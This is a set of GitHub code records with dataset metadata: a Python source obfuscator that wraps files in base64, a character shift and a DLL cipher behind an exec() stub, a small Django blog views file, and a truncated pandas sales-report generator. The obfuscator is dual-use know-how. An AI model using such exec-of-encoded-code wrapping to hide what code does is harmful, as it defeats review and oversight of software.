to file\n+ # NOTE: _protector.dll and _protector32.dll depends on others dlls used to build them, so uninstall visual studio can raise errors\n" }, { "alpha_fraction": 0.6209367513656616, "alphanum_fraction": 0.6577937006950378, "avg_line_length": 38.867347717285156, "blob_id": "7f2340ff3362539c4033ee7d0afdf2538f4d42fe", "content_id": "3c85951f720a23c0bfaa85f4fcf45f21f2d11bf9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3907, "license_type": "no_license", "max_line_length": 432, "num_lines": 98, "path": "/Protector/protector.py", "repo_name": "NADKennyTung/PythonObfuscated", "src_encoding": "UTF-8", "text": "import base64,sys,binascii,os,ctypes\nfrom ctypes import *\n\nkernel32 = ctypes.WinDLL('kernel32')\nuser32 = ctypes.WinDLL('user32')\nSW_MAXIMIZE = 3\n\ndef xor(string2encrypt):\n finalstring = \"\"\n string2encrypt = binascii.hexlify(bytes(string2encrypt,\"utf-8\"))\n for c in string2encrypt.decode():\n e = ord(c)\n f = e + 10\n finalstring += chr(f)\n return finalstring\n\ndef unxor(string2encrypt):\n finalstring = \"\"\n for c in string2encrypt:\n e = ord(c)\n f = e - 10\n finalstring += chr(f)\n finalstring = finalstring.replace(\"\\x00\",\"\")\n finalstring = bytes.fromhex(finalstring)\n return finalstring.decode()\n\ndef returnCipher(code):\n if sys.platform == \"win32\":\n #if the windows architecture is 32 bits\n if ctypes.sizeof(ctypes.c_voidp)==4:\n mydll=ctypes.CDLL(os.getcwd()+\"\\\\_protector32.dll\")\n #if the windows architecture is 64 bits\n elif ctypes.sizeof(ctypes.c_voidp)==8:\n mydll=ctypes.CDLL(os.getcwd()+\"\\\\_protector.dll\")\n mydll.Xoring.restype = c_wchar_p\n result = mydll.Xoring(code,\"4JT6Qc493H8Zkth6F6Wzyx123456\") #4JT6Qc493H8Zkth6F6Wzyx123456 la mat ma trong protector.dll\n return result\n\ndef StringEncrypt(string):\n if sys.platform == \"win32\":\n if ctypes.sizeof(ctypes.c_voidp)==4:\n mydll=ctypes.CDLL(os.getcwd()+\"\\\\_protector32.dll\")\n elif ctypes.sizeof(ctypes.c_voidp)==8:\n mydll=ctypes.CDLL(os.getcwd()+\"\\\\_protector.dll\")\n #set the return type to wchar*\n mydll.StringEncrypt.restype = c_wchar_p\n #get the encrypted result\n result = mydll.StringEncrypt(string)\n return result\n\n\ndef obfuscation():\n #obfu variable\n xorencode = \"def EEE3E3E3E3(O0O0O0):\\n Z2ZZZZ2Z2 = ''\\n for A1A1A1A1 in O0O0O0:\\n POPOPOP = ord(A1A1A1A1)\\n O0O0O0O0 = POPOPOP 
- 10\\n Z2ZZZZ2Z2 += chr(O0O0O0O0)\\n Z2ZZZZ2Z2 = Z2ZZZZ2Z2\\n return binascii.unhexlify(bytes(Z2ZZZZ2Z2,'utf-8')).decode()\\n\"\n #string encryption\n file2obfu = input(\"Input your file to obfuscate: \")\n toobfu = \"\"\n filetoobfu = open(file2obfu,\"r\",encoding=\"utf-8\",errors=\"ignore\")\n for line in filetoobfu:\n toobfu += line\n filetoobfu.close()\n\n #create Protect folder\n os.system(\"mkdir Protected\")\n filename = file2obfu\n filetoobfu_create = open(\"Protected\\\\\"+os.path.basename(filename),\"w\").close()\n filename_len = len(os.path.basename(filename))\n path = os.path.abspath(filename[0:-filename_len])\n path = path+\"\\\\\"\n\n os.system(\"mkdir Protected\\\\Protector\")\n os.system(\"copy _protector.dll Protected\\\\Protector\")\n os.system(\"copy _protector32.dll Protected\\\\Protector\")\n\n #create protector.py\n protector = open(\"Protected\\\\Protector\\\\protector.py\",\"w\") # convert \"a\" mode to \"w\" mode\n protector.write(\"from ctypes import *\\nimport sys,ctypes\\nif sys.platform == 'win32':\\n if ctypes.sizeof(ctypes.c_voidp)==4:\\n mydll=ctypes.CDLL('FunnyProtector\\\\\\_protector32.dll')\\n elif ctypes.sizeof(ctypes.c_voidp)==8:\\n mydll=ctypes.CDLL('FunnyProtector\\\\\\_protector.dll')\\ndef returnCipher(code,file):\\n mydll.unXoring.restype = c_wchar_p\\n result = mydll.unXoring(code,file)\\n return result\")\n protector.close()\n\n #starting obfuscation\n filetoobfu = open(\"Protected\\\\\"+os.path.basename(filename),\"a\")\n #base64 the realcode with junk\n obfuscate = base64.b64encode(bytes(toobfu,\"utf-8\"))\n #xor the base64 encoded code\n xored_obfuscate = xor(obfuscate.decode())\n final_obfu = returnCipher(\"import base64,binascii\\r\\n\"+\n xorencode+\n \"\\r\\nexec(base64.b64decode(EEE3E3E3E3('\"+xored_obfuscate+\"')))\")\n\n filetoobfu.write(\"from Protector import protector\\nexec(protector.returnCipher('\"+final_obfu+\"',__file__))\")\n filetoobfu.close()\n\ndef main():\n os.system(\"cls\")\n obfuscation()\n\nif __name__ == \"__main__\":\n main()\n" } ]
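The `xor`/`unxor` pair in protector.py above is the only reversible transform that does not depend on the `_protector.dll` binaries: it hexlifies the UTF-8 bytes and shifts every hex character's code point by +10. Below is a self-contained round-trip check of exactly that transform; only the sample payload string is an assumption added for the demo.

```python
import binascii

def xor(s):
    # As in protector.py: hexlify the UTF-8 bytes, then shift each hex char's code point by +10.
    return ''.join(chr(ord(c) + 10) for c in binascii.hexlify(s.encode('utf-8')).decode())

def unxor(s):
    # Inverse: shift back by -10, drop any NULs, then unhexlify.
    hexed = ''.join(chr(ord(c) - 10) for c in s).replace('\x00', '')
    return bytes.fromhex(hexed).decode('utf-8')

payload = "print('hello')"  # sample payload (assumption)
assert unxor(xor(payload)) == payload
```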
2
saintexupery/djangopractice04
https://github.com/saintexupery/djangopractice04
e8bbdea495ff595fd1c71d8c16ee05486580ddb8
4015cf11542f9976414cdfd9fb24b611eb770fc3
3fb23acaa4299fcdf014230b3d3ce7f47959779d
refs/heads/master
2016-06-09T05:38:00.037297
2016-05-10T18:07:59
2016-05-10T18:07:59
58,475,962
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5883561372756958, "alphanum_fraction": 0.5904109477996826, "avg_line_length": 27.096153259277344, "blob_id": "d1f8faee923fc02bb35b82b6211371bb1b20089b", "content_id": "97d38e90ce2945986219e0503e185a1e4b34b889", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1498, "license_type": "no_license", "max_line_length": 73, "num_lines": 52, "path": "/blog/views.py", "repo_name": "saintexupery/djangopractice04", "src_encoding": "UTF-8", "text": "from django.shortcuts import render, redirect\nfrom .models import Post\nfrom blog.forms import CommentForm\n\ndef post_list(request):\n post_list = Post.objects.all()\n return render(request, 'blog/post_list.html', {\n 'post_list' : post_list,\n })\n\ndef post_detail(request, pk):\n post = Post.objects.get(pk=pk)\n return render(request, 'blog/post_detail.html', {\n 'post' : post,\n })\n\n''' 이 부분 어디가 잘못되었는지 찾지를 못하겠다...\ndef comment_new(request, post_pk):\n if request.method == 'POST':\n form = CommentForm(request.POST, request.FILES)\n if form.is_vaild():\n comment = fomr.save(commit=False)\n comment.post = Post.objects.get(pk=post_pk)\n comment.save()\n return redirect('blog:post_detail', post_pk)\n else:\n form = CommentForm()\n\n return render(request, 'blog/comment_form.html', { 'form' : form,\n })\n'''\n\ndef comment_new(request, post_pk):\n# form = CommentForm()\n try:\n post = Post.objects.get(pk=post_pk)\n except Post.DoesNotExist:\n raise Http404\n\n if request.method == 'POST':\n form = CommentForm(request.POST, request.FILES)\n if form.is_valid():\n comment = form.save(commit=False)\n comment.post = post\n comment.save\n return redirect(post)\n else:\n form = CommentForm()\n\n return render(request, 'blog/comment_form.html', {\n 'form': form\n })" } ]
1
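The active `comment_new` view in the record above fetches the `Post` by hand and raises `Http404`; Django's `get_object_or_404` shortcut covers exactly this case. A sketch of the equivalent view, with model, form, and template names taken from the record; this is an illustrative rewrite, not the author's code:

from django.shortcuts import get_object_or_404, redirect, render

from blog.forms import CommentForm
from blog.models import Post

def comment_new(request, post_pk):
    # Replaces the manual try/except Post.DoesNotExist block in the record.
    post = get_object_or_404(Post, pk=post_pk)
    if request.method == 'POST':
        form = CommentForm(request.POST, request.FILES)
        if form.is_valid():
            comment = form.save(commit=False)
            comment.post = post
            comment.save()  # must be called; a bare `comment.save` is a no-op
            # redirect(post) assumes Post defines get_absolute_url(), as the
            # original view also does.
            return redirect(post)
    else:
        form = CommentForm()
    return render(request, 'blog/comment_form.html', {'form': form})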
kennedybacelar/test_environment_company
https://github.com/kennedybacelar/test_environment_company
fc406979885287ec1add06de94ec6b1396d40fa4
2b580aa552ab307564cd720b0f0b296f04712f22
5ce710adcb3fecf74a3e5824a1a88424d1261534
refs/heads/master
2022-11-20T20:20:14.912741
2020-07-07T16:25:38
2020-07-07T16:25:38
280,008,160
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6683411598205566, "alphanum_fraction": 0.6709246039390564, "avg_line_length": 44.41981887817383, "blob_id": "5b9571b350c1e67afb2df12f7335e34e929ef0da", "content_id": "7e6ce0e3db8568e11c647c2566f994b62c48e5d3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 34841, "license_type": "no_license", "max_line_length": 210, "num_lines": 767, "path": "/Entrepidus_generator.py", "repo_name": "kennedybacelar/test_environment_company", "src_encoding": "UTF-8", "text": "import pandas as pd\npd.options.mode.chained_assignment = None\nimport numpy as np\nimport sys\nfrom datetime import datetime, date\nsys.path.insert(1, 'Ent_generator')\nimport logger\nimport os\nimport warnings\n\nwarnings.simplefilter(action='ignore', category=pd.errors.PerformanceWarning)\n\ndef getting_user_input():\n\n STR_indicator = False\n\n root_path = input('Please inform root path: \\n')\n root_path = root_path.replace('\\\\', '/')\n\n country = input('Please inform the country of the distrbutor: \\n')\n country = country.lower()\n\n STR_country_list = ['paraguay', 'uruguay']\n\n if (country in STR_country_list):\n STR_indicator = True\n\n return [root_path, country, STR_indicator]\n\ndef getting_system_paths(root_path, country, STR_indicator):\n\n sales_file_path = str(root_path) + '/sales.txt'\n\n catalogs_root_path = '../../../Catalogs/Traditional_STR/'\n product_by_distributor_file_name = 'pebac_ref_prod.xlsx'\n\n if STR_indicator:\n product_by_distributor_file_name = 'str_ref_prod.xlsx'\n\n pebac_master_data_product_file_path = catalogs_root_path + 'Product_catalog/' + product_by_distributor_file_name\n product_master_path = catalogs_root_path + 'Product_catalog/product_master.xlsx'\n customer_catalog_file_path = catalogs_root_path + 'Customer_catalog/' + country + '_customer_catalog.xlsx'\n dist_names_file_path = catalogs_root_path + 'dist_names.xlsx'\n\n entrepidus_stock_directory_path = '/'.join(root_path.split('/')[:-1])\n entrepidus_stock_file_path = entrepidus_stock_directory_path + '/Entrepidus_STOCK.csv'\n\n system_paths = [sales_file_path, pebac_master_data_product_file_path, \n product_master_path, customer_catalog_file_path, dist_names_file_path, root_path, entrepidus_stock_file_path]\n\n return system_paths\n\ndef loading_dataframes(system_paths):\n\n sales_file_path = system_paths[0]\n pebac_master_data_product_file_path = system_paths[1]\n product_master_path = system_paths[2]\n customer_catalog_file_path = system_paths[3]\n dist_names_file_path = system_paths[4]\n\n df_sales_columns = ['Country', 'Diageo Customer ID', 'Diageo Customer Name', \n 'Invoice number', 'Type of Invoice',\t'Invoice Date', 'Store code', 'Product Code', \n 'Quantity', 'Unit of measure', 'Total Amount WITHOUT TAX', 'Total Amount WITH TAX', \n 'Currency Code', 'Sales Representative Code']\n\n #Loading Data Frame of Sales File\n try:\n df_sales = pd.read_csv(sales_file_path, index_col=False, names=df_sales_columns,sep=';', low_memory=False,\n dtype={ 'Quantity':str, 'Store code':str, 'Product Code':str, 'Invoice Date':str,\n 'Total Amount WITH TAX':str, 'Total Amount WITHOUT TAX':str }, header=0).fillna('')\n except:\n logger.logger.error('Not possible opening the file{}'.format(sales_file_path))\n print('Not possible opening the file - {}'.format(sales_file_path))\n sys.exit()\n\n #Loading Data Frame of (De->Para) / Product Customer -> Diageo SKU\n try:\n df_pebac_product_reference = pd.read_excel(pebac_master_data_product_file_path, converters = { 
'Dist_Code': str, 'Product_store_id': str} ).fillna('')\n df_pebac_product_reference.set_index(['Dist_Code', 'Product_store_id'], inplace=True) \n except:\n logger.logger.info('Not possible opening the file / setting index of {}'.format(pebac_master_data_product_file_path))\n print('Not possible opening the file - {}'.format(pebac_master_data_product_file_path))\n sys.exit()\n\n #Loading Data Frame of Product Master Data\n try:\n df_product_master = pd.read_excel(product_master_path, dtype={ 'Material': str }).fillna('') \n except:\n logger.logger.info('Not possible opening the file / setting index of {}'.format(product_master_path))\n print('Not possible opening the file - {}'.format(product_master_path))\n sys.exit()\n\n #Loading Data Frame of Customer Catalog Per Country\n try:\n df_customer_catalog = pd.read_excel(customer_catalog_file_path, converters={ 'Distributor_id':str, 'Store_id':str } ).fillna('') \n except:\n logger.logger.info('Not possible opening the file / setting index of {}'.format(customer_catalog_file_path))\n print('Not possible opening the file - {}'.format(customer_catalog_file_path))\n sys.exit()\n \n #Loading Data Frame of Distributors correct name and country\n try:\n df_dist_names = pd.read_excel(dist_names_file_path, dtype=str ).fillna('')\n except:\n print('Not possible opening file - {}'.format(dist_names_file_path))\n logger.logger.error('Not possible opening file - {}'.format(dist_names_file_path))\n sys.exit()\n\n\n #Dropping unnecessary columns of Dataframes to keep processing light\n try:\n df_sales.drop(columns=['Type of Invoice', 'Sales Representative Code'], inplace=True)\n except:\n logger.logger.info('Not possible dropping Columns of file - {}'.format(sales_file_path))\n\n #Dropping unnecessary columns of Product_master field\n try:\n df_product_master.drop(columns=['PRDHA L7 Packaging', 'Packaging', 'PRDHA L6 Volume',\n 'Subbrand', 'PRDHA L4 Brand Variant', 'PRDHA L3 Brand', 'PRDHA L2 Group',\n 'Group', 'PRDHA L1 Main Group', 'EU Size', 'Case Size'], inplace=True)\n except:\n logger.logger.info('Not possible dropping Columns of file - {}'.format(product_master_path))\n\n return [df_sales, df_pebac_product_reference, df_product_master, df_customer_catalog, df_dist_names]\n\n\ndef sanitizing_sales_file(df_sales):\n \n #Removing negative sign from the end of the values (Some samples were found)\n values_that_end_with_negative_sign_quantity = (df_sales['Quantity'].str[-1] == '-')\n df_sales.loc[values_that_end_with_negative_sign_quantity, 'Quantity'] = '-' + df_sales.loc[values_that_end_with_negative_sign_quantity, 'Quantity'].str[:-1]\n \n values_that_end_with_negative_sign_total_with_tax = (df_sales['Total Amount WITH TAX'].str[-1] == '-')\n df_sales.loc[values_that_end_with_negative_sign_total_with_tax, 'Total Amount WITH TAX'] = '-' + df_sales.loc[values_that_end_with_negative_sign_total_with_tax, 'Total Amount WITH TAX'].str[:-1]\n \n values_that_end_with_negative_sign_total_without_tax = (df_sales['Total Amount WITHOUT TAX'].str[-1] == '-')\n df_sales.loc[values_that_end_with_negative_sign_total_without_tax, 'Total Amount WITHOUT TAX'] = '-' + df_sales.loc[values_that_end_with_negative_sign_total_without_tax, 'Total Amount WITHOUT TAX'].str[:-1]\n \n #Converting the columns below to numeric\n df_sales['Quantity'] = pd.to_numeric(df_sales['Quantity']).fillna(0)\n df_sales['Total Amount WITH TAX'] = pd.to_numeric(df_sales['Total Amount WITH TAX']).fillna(0)\n df_sales['Total Amount WITHOUT TAX'] = pd.to_numeric(df_sales['Total Amount WITHOUT TAX']).fillna(0)\n \n 
#Removing spaces and leading zeros from the columns below\n df_sales['Product Code'] = df_sales['Product Code'].str.lstrip('0')\n df_sales['Store code'] = df_sales['Store code'].str.lstrip('0')\n df_sales['Store code'] = df_sales['Store code'].str.strip()\n\n #Cutting characters after the 12th position from Store Code column\n df_sales['Store code'] = df_sales['Store code'].str[:12]\n\n return df_sales\n\ndef sanitizing_df_pebac_product_reference(df_pebac_product_reference):\n\n df_pebac_product_reference.columns = [column.encode('mbcs').decode('mbcs', 'ignore') for column in df_pebac_product_reference.columns]\n df_pebac_product_reference['Scale'] = pd.to_numeric(df_pebac_product_reference['Scale']).fillna(1)\n\n return df_pebac_product_reference\n\ndef declaring_entrepidus_df():\n\n entrepidus_columns = ['Date', 'Store Number', 'Store Name', 'Chain', 'Supervisor', 'Region',\n 'Commune', 'Merchandiser', 'Chain SKU Code', 'Diageo SKU Code',\t'Desc Producto & Cód.',\n 'Category', 'Sub Category', 'Brand', 'Brand Variant', 'Unit Size', 'Unit Sold', \n 'Sales Value wotax', 'Sales Value wtax', 'Currency Code', 'Distributor', 'Country', \n 'Inventory Unit', 'Diageo_dist_auxiliar_column']\n\n try:\n try:\n df_entrepidus = pd.DataFrame(columns=entrepidus_columns).fillna('')\n except IOError as err:\n logger.logger.info('{}'.format(err))\n sys.exit(err)\n except:\n logger.logger.info('Not possible creating DataFrame df_entrepidus')\n sys.exit('Not possible creating DataFrame df_entrepidus')\n \n return df_entrepidus\n\ndef setting_df_entrepidus_and_sales(df_entrepidus, df_sales):\n\n try:\n df_entrepidus['Country'] = df_sales['Country']\n df_entrepidus['Sales Value wotax'] = df_sales['Total Amount WITHOUT TAX']\n df_entrepidus['Sales Value wtax'] = df_sales['Total Amount WITH TAX']\n df_entrepidus['Currency Code'] = df_sales['Currency Code']\n df_entrepidus['Store Number'] = df_sales['Store code']\n df_entrepidus['Date'] = df_sales['Invoice Date']\n df_entrepidus['Chain SKU Code'] = df_sales['Product Code']\n df_entrepidus['Distributor'] = df_sales['Diageo Customer Name']\n df_entrepidus['Unit Sold'] = df_sales['Quantity']\n df_entrepidus['Inventory Unit'] = 0\n\n #Auxiliary columns - won't be written into the excel file\n df_entrepidus['Diageo_dist_auxiliar_column'] = df_sales['Diageo Customer ID']\n df_entrepidus['Aux_unit_of_measure'] = df_sales['Unit of measure']\n\n #Changing to String below Columns\n df_entrepidus['Diageo_dist_auxiliar_column'] = df_entrepidus['Diageo_dist_auxiliar_column'].astype(str).fillna('')\n df_sales['Product Code'] = df_sales['Product Code'].astype(str).fillna('')\n df_entrepidus['Store Number'] = df_entrepidus['Store Number'].astype(str).fillna('')\n #Changing to Numeric below Columns\n df_entrepidus['Unit Sold'] = pd.to_numeric(df_entrepidus['Unit Sold'])\n #Lowercasing the entrepidus series below\n df_entrepidus['Aux_unit_of_measure'] = df_entrepidus['Aux_unit_of_measure'].astype(str).fillna('').str.lower()\n except:\n logger.logger.error('Not possible setting_df_entrepidus / sales')\n sys.exit('Not possible setting_df_entrepidus')\n \n return [df_entrepidus, df_sales]\n\ndef assigning_dist_names_and_country_to_entrepidus(df_entrepidus, df_dist_names):\n\n list_of_distributors = df_entrepidus['Diageo_dist_auxiliar_column'].unique()\n df_entrepidus.set_index(['Diageo_dist_auxiliar_column'], inplace=True)\n df_entrepidus.index = df_entrepidus.index.map(str)\n\n df_dist_names.set_index(['Distributor_id'], inplace=True)\n df_dist_names.index = df_dist_names.index.map(str)\n 
df_dist_names = df_dist_names[~df_dist_names.index.duplicated(keep='first')]\n\n for single_distributor in list_of_distributors:\n single_distributor = str(single_distributor)\n\n try:\n distributor_correct_name = df_dist_names.loc[single_distributor, 'Distributor_name']\n distributor_correct_country = df_dist_names.loc[single_distributor, 'Distributor_country']\n except:\n print('Dist name columns Distributor_name or Distributor_country not found')\n logger.logger.error('Dist name columns Distributor_name or Distributor_country not found')\n\n try:\n df_entrepidus.loc[single_distributor, 'Distributor'] = distributor_correct_name\n except:\n print('Error - Distributor name in dist_names file: {}'.format(single_distributor))\n logger.logger.error('Not possible assigning distributor name from Dist_names_file - {}'.format(single_distributor))\n \n try:\n df_entrepidus.loc[single_distributor, 'Country'] = distributor_correct_country\n except:\n print('Not possible assigning distributor country from Dist_names_file - {}'.format(single_distributor))\n logger.logger.error('Not possible assigning distributor country from Dist_names_file - {}'.format(single_distributor))\n \n df_dist_names.reset_index(inplace=True) \n df_entrepidus.reset_index(inplace=True)\n return df_entrepidus\n\n#The second argument is the customer-product -> Diageo SKU reference, indexed by ['Dist_Code', 'Product_store_id']\ndef searching_diageo_sku(df_sales, df_pebac_product_reference, df_entrepidus):\n\n list_of_distributors = df_sales['Diageo Customer ID'].unique()\n \n df_sales = df_sales.set_index(['Diageo Customer ID'])\n df_sales.index = df_sales.index.map(str)\n\n df_entrepidus = df_entrepidus.set_index(['Diageo_dist_auxiliar_column', 'Chain SKU Code'])\n df_entrepidus.index = df_entrepidus.index.set_levels(df_entrepidus.index.levels[0].astype(str), level=0)\n df_entrepidus.index = df_entrepidus.index.set_levels(df_entrepidus.index.levels[1].astype(str), level=1)\n \n for single_distributor in list_of_distributors:\n single_distributor = str(single_distributor)\n products_list_by_distributor = df_sales.loc[single_distributor]['Product Code'].unique()\n\n for single_product_by_distributor in products_list_by_distributor:\n single_product_by_distributor = str(single_product_by_distributor)\n\n try:\n diageo_sku = df_pebac_product_reference.loc[(single_distributor, single_product_by_distributor), 'Diageo_Sku'].values[0]\n df_entrepidus.loc[(single_distributor, single_product_by_distributor), 'Diageo SKU Code'] = diageo_sku\n except:\n df_entrepidus.loc[(single_distributor, single_product_by_distributor), 'Diageo SKU Code'] = '0000 - NOT FOUND'\n print('{} - New product found'.format(single_product_by_distributor))\n logger.logger.warning('{} - Product not found'.format(single_product_by_distributor))\n\n df_entrepidus.reset_index(inplace = True)\n df_pebac_product_reference.reset_index(inplace=True)\n return df_entrepidus\n \n\n#Filling Entrepidus with the product details\ndef filling_product_details(df_entrepidus, df_product_master):\n\n df_product_master.set_index(['Material'], inplace=True)\n df_product_master.index = df_product_master.index.map(str) #Changing indexes into string\n df_product_master = df_product_master[~df_product_master.index.duplicated(keep='last')]\n\n list_of_diageo_sku_unique = df_entrepidus['Diageo SKU Code'].unique()\n\n df_entrepidus.set_index(['Diageo SKU Code'], inplace=True)\n df_entrepidus.index = df_entrepidus.index.map(str) #Changing indexes into string\n\n for specific_diageo_sku in list_of_diageo_sku_unique:\n specific_diageo_sku = str(specific_diageo_sku)\n try:\n df_entrepidus['Desc Producto & Cód.'].loc[specific_diageo_sku] 
= df_product_master['Description'].loc[specific_diageo_sku]\n df_entrepidus['Category'].loc[specific_diageo_sku] = df_product_master['Main Group'].loc[specific_diageo_sku]\n df_entrepidus['Sub Category'].loc[specific_diageo_sku] = df_product_master['Subcategory'].loc[specific_diageo_sku]\n df_entrepidus['Brand'].loc[specific_diageo_sku] = df_product_master['Brand'].loc[specific_diageo_sku]\n df_entrepidus['Brand Variant'].loc[specific_diageo_sku] = df_product_master['Brand Variant'].loc[specific_diageo_sku]\n df_entrepidus['Unit Size'].loc[specific_diageo_sku] = df_product_master['Unit Size'].loc[specific_diageo_sku]\n except:\n logger.logger.error('{} - Not possible filling the details of this product'.format(specific_diageo_sku))\n \n df_entrepidus.reset_index(inplace=True)\n return df_entrepidus\n\n\n#Filling Entrepidus with quantities (Unit Sold - after multiplying by the product conversion factor)\ndef calculating_quantity(df_entrepidus, df_pebac_product_reference):\n\n df_pebac_product_reference.set_index(['Dist_Code', 'Product_store_id'], inplace=True)\n #Changing both levels of the MultiIndex to String\n df_pebac_product_reference.index = df_pebac_product_reference.index.set_levels(df_pebac_product_reference.index.levels[0].astype(str), level=0)\n df_pebac_product_reference.index = df_pebac_product_reference.index.set_levels(df_pebac_product_reference.index.levels[1].astype(str), level=1)\n\n list_of_distributors = df_entrepidus['Diageo_dist_auxiliar_column'].unique()\n\n for single_distributor in list_of_distributors:\n single_distributor = str(single_distributor)\n\n filt_single_distributor = (df_entrepidus['Diageo_dist_auxiliar_column'] == single_distributor)\n list_of_products_by_distributor = df_entrepidus.loc[filt_single_distributor, 'Chain SKU Code'].unique()\n\n df_entrepidus['Diageo_dist_auxiliar_column'] = df_entrepidus['Diageo_dist_auxiliar_column'].astype(str).fillna('')\n df_entrepidus['Chain SKU Code'] = df_entrepidus['Chain SKU Code'].astype(str).fillna('')\n\n for single_product in list_of_products_by_distributor:\n single_product = str(single_product)\n\n try:\n multiplicative_factor = df_pebac_product_reference.loc[( single_distributor , single_product ), 'Scale'].values\n multiplicative_factor = multiplicative_factor[0]\n except:\n logger.logger.info('multiplicative_factor not found in df_pebac_product_reference for Distributor - {} Product - {}'.format(single_distributor, single_product))\n multiplicative_factor = 1\n\n try:\n filt_key_dist_prod = (df_entrepidus['Diageo_dist_auxiliar_column'] == str(single_distributor) ) & (df_entrepidus['Chain SKU Code'] == str(single_product)) \n df_entrepidus.loc[filt_key_dist_prod, 'Unit Sold'] = df_entrepidus.loc[filt_key_dist_prod, 'Unit Sold'].multiply(multiplicative_factor)\n except:\n logger.logger.error('Error in multiplication - Bottles per Physical Case - dist/product {}/{}'.format(single_distributor, single_product))\n \n try:\n df_entrepidus['Unit Sold'] = df_entrepidus['Unit Sold'].round(0).astype(int)\n except:\n logger.logger.error('Not possible rounding df_entrepidus[Unit Sold]')\n\n df_pebac_product_reference.reset_index(inplace=True)\n df_entrepidus.reset_index(inplace=True)\n\n return df_entrepidus\n\n#Filling Entrepidus with the store names\ndef getting_store_name(df_entrepidus, df_customer_catalog):\n\n new_stores = list()\n\n df_customer_catalog.set_index([ 'Distributor_id', 'Store_id' ], inplace=True)\n #Changing both levels of the MultiIndex to String\n df_customer_catalog.index = 
df_customer_catalog.index.set_levels(df_customer_catalog.index.levels[0].astype(str), level=0)\n df_customer_catalog.index = df_customer_catalog.index.set_levels(df_customer_catalog.index.levels[1].astype(str), level=1)\n \n list_of_distributors = df_entrepidus['Diageo_dist_auxiliar_column'].unique()\n\n df_entrepidus['Diageo_dist_auxiliar_column'] = df_entrepidus['Diageo_dist_auxiliar_column'].astype(str).fillna('')\n df_entrepidus['Store Number'] = df_entrepidus['Store Number'].astype(str).fillna('')\n\n for single_distributor in list_of_distributors:\n single_distributor = str(single_distributor)\n \n filt_single_distributor = (df_entrepidus['Diageo_dist_auxiliar_column'] == single_distributor)\n list_of_unique_stores_by_distributor = df_entrepidus.loc[(filt_single_distributor), 'Store Number'].unique()\n\n \n for unique_store in list_of_unique_stores_by_distributor:\n unique_store = str(unique_store)\n\n try:\n store_name = df_customer_catalog.loc[[(single_distributor, unique_store)], 'Store_name'].values\n store_name = store_name[0]\n except:\n new_unique_store = single_distributor + '|' + unique_store\n new_stores.append(new_unique_store)\n store_name = '0000 - NOT FOUND'\n\n try:\n filt_single_store_by_distributor = ((df_entrepidus['Diageo_dist_auxiliar_column'] == str(single_distributor)) & (df_entrepidus['Store Number'] == str(unique_store)))\n df_entrepidus.loc[(filt_single_store_by_distributor), 'Store Name'] = store_name\n except:\n pass\n\n df_customer_catalog.reset_index(inplace=True)\n\n return [df_entrepidus, new_stores]\n\n\n#Filtering period - not used yet\ndef filtering_period(df_entrepidus, previous_and_current_month_period):\n\n current_month = previous_and_current_month_period[0]\n previous_month = previous_and_current_month_period[1]\n\n entrepidus_filtered_period = ((df_entrepidus['Date'].str[:6] == current_month) | (df_entrepidus['Date'].str[:6] == previous_month))\n df_entrepidus = df_entrepidus.loc[entrepidus_filtered_period]\n\n return df_entrepidus\n\ndef creating_new_stores_dataframe():\n\n new_store_columns = ['Aux_column_dist_number', 'POS_ID', 'Store Nbr', 'Store Name', 'Chain', 'Commercial Group', 'Store/Business Type',\n 'Subchannel', 'Channel', 'Trade', 'Segment', 'Occasion', 'Occasion Segment', 'Merchandiser', 'Supervisor',\n 'Province or Commune', 'City', 'State or Region', 'Country', 'COU']\n\n df_new_stores = pd.DataFrame(columns=new_store_columns).fillna('')\n \n return df_new_stores\n\n# Registering new stores\ndef registering_new_stores(new_stores, df_new_stores):\n\n unique_stores = list(set(new_stores)) #Getting new stores - Filtering and getting unique values\n\n for individual_store in unique_stores:\n\n distributor_and_store_split = individual_store.split('|')\n distributor_id = distributor_and_store_split[0]\n store_number = distributor_and_store_split[1]\n\n df_new_stores_length = len(df_new_stores)\n\n df_new_stores.loc[df_new_stores_length, 'Aux_column_dist_number'] = distributor_id\n df_new_stores.loc[df_new_stores_length, 'Store Nbr'] = store_number\n \n df_new_stores.fillna('', inplace=True)\n\n return df_new_stores\n\n\n# Getting current and previous month\ndef get_previous_and_current_month_period():\n \n today = date.today()\n month = today.month\n year = today.year\n\n if (month == 1):\n year_previous_month = year - 1\n previous_month = 12\n else:\n year_previous_month = year\n previous_month = month - 1\n \n current_month = str(year) + str(month).zfill(2)\n previous_month = str(year_previous_month) + str(previous_month).zfill(2)\n\n 
return [current_month, previous_month]\n\n#Final formatting entrepidus\ndef entrepidus_formatting(df_entrepidus):\n\n df_entrepidus.reset_index(inplace=True)\n try:\n df_entrepidus.drop(columns=['level_0', 'index'], inplace=True)\n except:\n logger.logger.warning('Not possible dropping columns to generate excel file')\n\n entrepidus_columns = ['Diageo_dist_auxiliar_column', 'Date', 'Store Number', 'Store Name', 'Chain', 'Supervisor', 'Region',\n 'Commune', 'Merchandiser', 'Chain SKU Code', 'Diageo SKU Code',\t'Desc Producto & Cód.',\n 'Category', 'Sub Category', 'Brand', 'Brand Variant', 'Unit Size', 'Unit Sold', \n 'Sales Value wotax', 'Sales Value wtax', 'Currency Code', 'Distributor', 'Country', \n 'Inventory Unit']\n\n df_entrepidus = df_entrepidus.reindex(columns=entrepidus_columns)\n #df_entrepidus = df_entrepidus.sort_values(by='Date', ascending=False)\n\n return df_entrepidus\n\ndef verifying_values_with_without_tax(df_entrepidus):\n\n df_entrepidus['Sales Value wtax'] = pd.to_numeric(df_entrepidus['Sales Value wtax'], errors='coerce').fillna(0)\n df_entrepidus['Sales Value wotax'] = pd.to_numeric(df_entrepidus['Sales Value wotax'], errors='coerce').fillna(0)\n\n sum_value_with_tax = df_entrepidus['Sales Value wtax'].sum()\n sum_value_without_tax = df_entrepidus['Sales Value wotax'].sum()\n\n if ( sum_value_without_tax > sum_value_with_tax ):\n\n df_entrepidus.rename(columns={ 'Sales Value wtax':'Sales Value wotax', 'Sales Value wotax':'Sales Value wtax' }, inplace=True)\n\n return df_entrepidus\n\ndef loading_stock_file(entrepidus_stock_file_path):\n\n found_entrepidus_stock = True\n\n try:\n df_entrepidus_stock = pd.read_csv( entrepidus_stock_file_path, encoding='mbcs', 